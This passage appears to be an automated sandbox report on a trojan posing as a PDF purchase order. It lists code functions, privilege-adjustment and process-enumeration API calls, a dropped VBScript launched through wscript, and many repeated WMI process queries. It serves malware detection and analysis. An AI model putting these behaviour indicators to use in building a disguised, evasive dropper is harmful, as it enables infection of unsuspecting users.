              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C9DCD01_2_00C9DCD0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C9A0C01_2_00C9A0C0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB01831_2_00CB0183
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD220C1_2_00CD220C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C985301_2_00C98530
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C966701_2_00C96670
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB06771_2_00CB0677
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC87791_2_00CC8779
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFA8DC1_2_00CFA8DC
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB0A8F1_2_00CB0A8F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C96BBC1_2_00C96BBC
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CBAC831_2_00CBAC83
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C98CA01_2_00C98CA0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAAD5C1_2_00CAAD5C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB0EC41_2_00CB0EC4
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC4EBF1_2_00CC4EBF
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC113E1_2_00CC113E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB12F91_2_00CB12F9
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC542F1_2_00CC542F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF5D01_2_00CFF5D0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC599F1_2_00CC599F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CBDA741_2_00CBDA74
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C9BDF01_2_00C9BDF0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CBBDF61_2_00CBBDF6
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C95D321_2_00C95D32
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CB1E5A1_2_00CB1E5A
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CC7FFD1_2_00CC7FFD
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDBFB81_2_00CDBFB8
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CBDF691_2_00CBDF69
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: String function: 00CB7750 appears 42 times
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: String function: 00CAF885 appears 68 times
              Source: Purchase Order Supplies.Pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@0/1
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDD712 GetLastError,FormatMessageW,1_2_00CDD712
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CCB8B0 AdjustTokenPrivileges,CloseHandle,1_2_00CCB8B0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CCBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00CCBEC3
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_00CDEA85
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,1_2_00CD6F5B
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CEC604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,1_2_00CEC604
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00C931F2
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeFile created: C:\Users\user\AppData\Roaming\WindataJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeFile created: C:\Users\user\AppData\Local\Temp\KKRBIX.vbsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
